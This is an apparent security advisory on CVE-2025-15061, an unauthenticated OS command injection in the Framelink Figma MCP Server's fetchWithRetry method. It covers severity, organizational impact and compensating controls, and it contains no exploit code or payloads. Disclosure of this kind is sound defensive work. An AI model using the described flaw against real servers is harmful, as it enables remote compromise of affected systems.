CVE-2025-15061 is an OS command injection vulnerability classified under CWE-78, affecting the Framelink Figma MCP Server, specifically within the fetchWithRetry method. The vulnerability arises because the server fails to properly sanitize or neutralize special characters in user-supplied input before incorporating it into system-level command execution. This lack of input validation allows an unauthenticated remote attacker to inject arbitrary OS commands, which the server executes with the privileges of the service account running the MCP Server. The vulnerability is remotely exploitable over the network without requiring any authentication or user interaction, making it highly dangerous. The CVSS v3.0 base score is 9.8, reflecting the critical nature of this flaw with high impact on confidentiality, integrity, and availability. The attacker can gain full control over the affected server, potentially leading to data theft, service disruption, or pivoting to other internal systems. Although no public exploits have been reported yet, the vulnerability was assigned a ZDI identifier (ZDI-CAN-27877) and published in early 2026, indicating it is known and documented. The affected version is identified by a specific commit hash, suggesting the vulnerability exists in particular builds or releases of the product. The lack of available patches at the time of disclosure increases the urgency for organizations to implement compensating controls.

For European organizations, the impact of this vulnerability is significant. The ability for unauthenticated remote attackers to execute arbitrary code can lead to complete system compromise, exposing sensitive design files, intellectual property, and user data managed by the Framelink Figma MCP Server. This could disrupt critical creative workflows, cause data breaches, and damage organizational reputation. Given the high CVSS score and critical severity, exploitation could result in widespread service outages and loss of data integrity. Organizations in sectors such as digital media, advertising, and software development that rely on Framelink's Figma MCP Server are particularly vulnerable. Additionally, the potential for lateral movement within corporate networks increases the risk of broader compromise. The absence of known exploits in the wild currently provides a small window for proactive defense, but the ease of exploitation and lack of authentication requirements mean that attackers could rapidly weaponize this vulnerability once exploit code becomes available.

Immediate mitigation steps include applying any available patches or updates from Framelink as soon as they are released. In the absence of official patches, organizations should implement strict input validation and sanitization on any interfaces interacting with the fetchWithRetry method to prevent injection of malicious commands. Network-level controls such as firewall rules should restrict access to the MCP Server to trusted IP addresses only. Employing network segmentation to isolate the server from critical internal systems can limit potential lateral movement. Monitoring and logging of system calls and unusual process execution on the MCP Server should be enhanced to detect exploitation attempts early. Additionally, consider deploying application-layer firewalls or intrusion prevention systems capable of detecting command injection patterns. Regularly review and minimize the privileges of the service account running the MCP Server to reduce the impact of a successful exploit. Finally, conduct security awareness training for administrators and developers regarding secure coding practices and vulnerability management.